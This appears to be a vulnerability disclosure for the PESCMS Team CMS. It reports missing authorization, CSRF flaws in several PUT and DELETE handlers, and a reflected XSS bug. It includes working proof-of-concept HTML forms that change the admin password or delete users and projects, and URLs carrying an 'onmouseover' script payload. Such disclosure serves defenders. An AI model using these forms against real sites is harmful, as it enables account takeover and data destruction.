Technical Description:
file :
pescms/App/Team/PUT/User.php
The function of this file is to Modify personal information,but it don't Verify whether the operation is legal. Through it attackers can modify admin's password ,mail,phone and head-image.
Proof of Concept(PoC)
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/pescms/Public/?g=Team&m=User&a=setting" method="POST">
<input type="hidden" name="method" value="PUT" />
<input type="hidden" name="name" value="admin" />
<input type="hidden" name="mail" value="123456@qq.com" />
<input type="hidden" name="phone" value="" />
<input type="hidden" name="password" value="newadmin" />
<input type="hidden" name="home" value="Team-Index-index" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Success.And the password of admin has been modify.
Technical Description: file:
pescms/App/Team/DELETE/Content.php
pescms/App/Team/DELETE/Field.php
Throught it can delete Any member and administrator just by modify the 'id' that in Url.
Delete the Account number of administrator just need to modify the id as '1'.
Proof of Concept(PoC)
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/pescms/Public/?g=Team&m=User&a=action&id=36&method=DELETE&back_url=L3Blc2Ntcy9QdWJsaWMvP2c9VGVhbSZtPVVzZXImYT1pbmRleA==" method="POST">
<input type="hidden" name="" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
We refresh the list of user ,that find that the user that called light is deleted.
Technical Description: file:
pescms/App/Team/DELETE/Attachment.php
pescms/App/Team/DELETE/Content.php
pescms/App/Team/DELETE/Field.php
pescms/App/Team/DELETE/Model.php
pescms/App/Team/DELETE/Notice.php
Through CSRF to Delete important data is exist in these files.
ALL the delete operations are not verify in front page. Like this:
Proof of Concept(PoC)
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/pescms/Public/?g=Team&m=Project&a=action&id=1&method=DELETE&back_url=L3Blc2Ntcy9QdWJsaWMvP2c9VGVhbSZtPVByb2plY3QmYT1pbmRleA==" method="POST">
<input type="hidden" name="" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
And other operations of delete are exist on this cms. Just give the positions,don't prove.
In line 72-78 , the data from $_GET('begin') and $_GET('end') is transfer to variables, and output in pages.
Proof of Concept(PoC)
localhost/pescms/Public/?g=Team&m=Report&a=extract&begin="onmouseover=alert(1)//&end=&user=0
or
localhost/pescms/Public/?g=Team&m=Report&a=extract&begin=&end="onmouseover=alert(1)//&user=0
or,page:
http://localhost/pescms/Public/?g=Team&m=Report&a=allExtract&begin="onmouseover=alert(1)//&end=&user=0